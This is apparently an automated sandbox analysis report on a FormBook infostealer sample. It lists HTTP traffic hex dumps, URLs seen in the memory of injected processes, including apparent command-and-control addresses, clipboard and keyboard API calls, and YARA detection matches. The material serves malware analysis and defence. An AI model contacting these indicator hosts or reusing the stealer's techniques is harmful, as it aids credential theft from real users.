1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:38:57 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:39:00 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Sep 2024 07:39:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTAccept-Ranges: bytesContent-Length: 2361Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 35 37 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 35 37 78 35 37 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 37 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 38 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f
            Source: rasdial.exe, 00000006.00000002.4131381557.00000000068B8000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003B28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://anaidittrich.com/qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005904000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002B74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2317942317.00000000317D4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000006402000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000006402000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003672000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/docs/manuals/enterprise/
            Source: sXIYDUFnJY.exe, 00000007.00000002.4132511834.0000000004C2A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tadalaturbo.online
            Source: sXIYDUFnJY.exe, 00000007.00000002.4132511834.0000000004C2A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tadalaturbo.online/7o3y/
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130799884.00000000034E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xforum.tech/647x/?56gD=FnaXBox54
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://es.wordpress.org/
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000006.00000002.4129935953.0000000003164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000006.00000003.2206318990.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/acerca-de/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/blog/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/comments/feed/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/contacto/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/feed/
            Source: sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/wp-json/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/xmlrpc.php?rsd
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000006726000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003996000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://tilda.cc
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/wordpress
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000006A4A000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000003CBA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy
            Source: rasdial.exe, 00000006.00000002.4133150146.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rasdial.exe, 00000006.00000002.4131381557.0000000005C28000.00000004.10000000.00040000.00000000.sdmp, sXIYDUFnJY.exe, 00000007.00000002.4130799884.0000000002E98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/explore/tags/wordcamp/
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006F425A
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006F4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_006F4458
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006F425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_006F425A
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_006E0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_006E0219
            Source: C:\Users\user\Desktop\220204-TF1--00.exeCode function: 0_2_0070CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0070CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
